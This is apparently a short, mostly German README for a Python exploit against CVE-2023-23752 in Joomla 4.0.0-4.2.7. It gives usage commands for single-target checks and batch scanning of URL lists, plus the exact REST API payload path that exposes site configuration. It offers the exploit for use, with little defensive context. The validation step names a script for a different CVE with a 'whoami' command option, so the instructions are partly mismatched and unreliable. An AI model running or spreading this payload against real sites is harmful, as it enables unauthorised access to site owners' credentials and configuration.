
Python-basierter Exploit für CVE-2023-23752, der Joomla 4.0.0-4.2.7 betrifft und unbefugten REST-API-Zugriff ermöglicht, wodurch die Offenlegung sensibler Informationen durch manipulierte Payloads ermöglicht wird.
CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability
Python-Bibliothek installieren
pip install -r requirements.txt
Schwachstellen-Validierung
python3 CVE-2022-26134_check.py -u url -c whoami

Batch-Scan
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
Rufe die verwundbare Adresse auf, zeichne den Datenverkehr auf und spiele das Paket erneut ab.

In Joomla! CMS Version 4.0.0 bis 4.2.7 kann eine unzureichende Zugriffsbeschränkung der Web-Service-Endpunkte zu einem nicht autorisierten Zugriff auf die REST-API führen und die Offenlegung sensibler Informationen verursachen.